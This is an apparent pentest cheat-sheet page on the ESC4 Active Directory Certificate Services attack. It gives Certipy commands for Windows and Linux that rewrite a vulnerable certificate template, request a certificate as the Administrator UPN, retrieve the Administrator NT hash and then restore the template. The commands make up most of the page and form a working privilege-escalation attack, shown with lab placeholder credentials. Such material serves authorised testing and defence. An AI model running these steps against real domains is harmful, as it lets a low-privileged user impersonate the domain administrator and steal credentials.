Skip to main content

ESC4

You can create misconfigurations even in templates that are not initially vulnerable. For example, enabling the mspki-certificate-name-flag for a template allowing domain authentication could result in a situation similar to ESC1. This might allow less privileged users to define a fake Subject Alternative Name and authenticate as another user.

Windows

Attacking ESC4 vulnerable template

PS /home/bobbuilder> .\certipy.exe template -u 'user1@minions.com' -p 'password1' -template <template_name> -save-old -dc-ip <ip>

ESC4 Template after modification

PS /home/bobbuilder> .\certipy.exe find -u 'user1@minions.com' -p 'password1' -vulnerable -stdout -dc-ip <ip>

Abusing the modified template

PS /home/bobbuilder> .\certipy.exe req -u 'user1@minions.com' -p 'password1' -ca lab-LAB-DC-CA<ca_name> -template <template_name> -upn Administrator

Retrieve Administrator NT Hash

PS /home/bobbuilder> .\certipy.exe auth -pfx administrator.pfx -username Administrator -domain minions.com

Restore template configuration

PS /home/bobbuilder> .\certipy.exe template -u 'user1@minions.com' -p 'password1' -template <template_name> -configuration <template_name>.json

Linux

Attacking ESC4 vulnerable template

bob$ certipy template -u 'user1@minions.com' -p 'password1' -template <template_name> -save-old -dc-ip <ip>

ESC4 Template after modification

bob$ certipy find -u 'user1@minions.com' -p 'password1' -vulnerable -stdout -dc-ip <ip>

Abusing the modified template

bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca lab-LAB-DC-CA<ca_name> -template <template_name> -upn Administrator

Retrieve Administrator NT Hash

bob$ certipy auth -pfx administrator.pfx -username Administrator -domain minions.com

Restore template configuration

bob$ certipy template -u 'user1@minions.com' -p 'password1' -template <template_name> -configuration <template_name>.json